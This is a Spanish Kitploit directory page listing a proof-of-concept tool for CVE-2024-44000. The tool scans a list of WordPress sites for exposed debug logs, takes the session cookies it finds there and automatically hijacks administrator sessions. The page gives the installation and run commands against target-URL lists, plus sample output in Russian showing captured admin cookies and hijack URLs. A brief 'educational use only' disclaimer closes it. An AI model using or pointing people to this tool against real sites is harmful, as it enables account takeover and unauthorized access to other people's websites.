Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-44000 — es una herramienta de PoC diseñada para explotar registros de depuración expuestos de forma insegura de sitios WordPress y extraer cookies de sesión | Kitploit
Herramientas/GitHubGitHub/geniuszly/cve-2024-44000
ExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónRed Teaming
GitHubgeniuszly/cve-2024-44000

CVE-2024-44000

es una herramienta de PoC diseñada para explotar registros de depuración expuestos de forma insegura de sitios WordPress y extraer cookies de sesión

Ver Repositorio
5hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

ES

GenCookieSessionHijack es una herramienta PoC diseñada para explotar registros de depuración expuestos de forma insegura en sitios WordPress y extraer cookies de sesión. Esto permite al atacante secuestrar sesiones activas de administrador y obtener acceso no autorizado al panel de administración de WordPress.

Características

  • Extraer cookies de los registros de depuración de WordPress.
  • Identificar y filtrar cookies de sesión (ej., wordpress_logged_in).
  • Intentar automáticamente el secuestro de sesión para acceso de administrador.
  • Abrir la sesión de administrador secuestrada directamente en el navegador.

Uso

Instalación

root@kitploit:~
git clone https://github.com/geniuszly/CVE-2024-44000
cd CVE-2024-44000
pip install -r requirements.txt

Ejecutar la herramienta

  1. Prepare una lista de URLs objetivo de WordPress en un archivo, una por línea (ej., list.txt).
  • Ejecute la herramienta usando el siguiente comando:
  • root@kitploit:~
    python GenCookieSessionHijack.py -f list.txt -o result.txt
    

    Parámetros

    • -f, --file: Ruta al archivo que contiene la lista de URLs (por defecto: list.txt).
    • -o, --output: Archivo para guardar los resultados (por defecto: result.txt).

    Ejemplo

    root@kitploit:~
    python GenCookieSessionHijack.py -f targets.txt -o output.txt
    

    Esto leerá la lista de URLs de targets.txt, intentará extraer y usar cookies de sesión, y guardará los resultados en output.txt.

    Salida

    Si el intento de secuestro de sesión es exitoso, la herramienta generará una URL con la cookie de sesión de administrador secuestrada y la abrirá directamente en el navegador predeterminado.

    Ejemplo de salida:

    root@kitploit:~
    [+] Лог-файл успешно получен с http://example.com
    [+] Найдены session cookies для http://example.com:
        wordpress_logged_in_abcdef123456
    [+] Успешно захвачен сеанс администратора с cookie: wordpress_logged_in_abcdef123456
    [+] URL захваченного сеанса: http://example.com/wp-login.php?redirect_to=http://example.com/wp-admin/?wordpress_logged_in_abcdef123456
    [+] Установленный cookie: http://example.com/wp-login.php?cookie=wordpress_logged_in_abcdef123456
    
    [-] Не удалось захватить сеанс администратора с cookie: wordpress_logged_in_invalidcookie
    
    [-] Session cookies не найдены в логах для http://another-example.com
    [-] Не удалось получить лог-файл для http://another-example.com. Код ответа: 404
    
    

    Aviso legal

    Esta herramienta está destinada únicamente a fines educativos y no debe ser utilizada para actividades ilegales. El autor no es responsable de ningún uso indebido o daño causado por esta herramienta.

    Descargar herramienta